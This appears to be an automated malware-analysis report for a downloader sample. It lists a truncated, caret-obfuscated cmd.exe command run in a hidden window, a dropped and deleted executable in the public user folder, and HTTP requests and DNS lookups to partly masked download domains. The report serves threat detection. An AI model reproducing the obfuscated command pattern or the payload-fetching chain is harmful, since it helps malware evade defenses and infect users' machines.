Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\cmd.exe' NkoOtVni CFzLJOFYnOIvddjYvKKawA MntOYkkRlibQS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %FwdCQboamiaIsHd%=QPVZHSrb&&set %PWzqNvHZLCjkF%=p&&set %EdYfjBd%=o^w&...
Modifies file system
Creates the following files
- C:\users\public\250302.exe
Deletes the following files
- C:\users\public\250302.exe
Network activity
Connects to
- 'aw#s.ws':80
- 'fl####-berlin.de':80
- 'ar####okearte.com':80
TCP
HTTP GET requests
- http://aw#s.ws/UneuxB/
- http://fl####-berlin.de/UdUNS/
- http://ar####okearte.com/jSCCn/
UDP
- DNS ASK aw#s.ws
- DNS ASK fl####-berlin.de
- DNS ASK ar####okearte.com
- DNS ASK ca###trhy.cz
- DNS ASK av##lus.net
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\cmd.exe' NkoOtVni CFzLJOFYnOIvddjYvKKawA MntOYkkRlibQS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %FwdCQboamiaIsHd%=QPVZHSrb&&set %PWzqNvHZLCjkF%=p&&set %EdYfjBd%=o^w&...' (with hidden window)
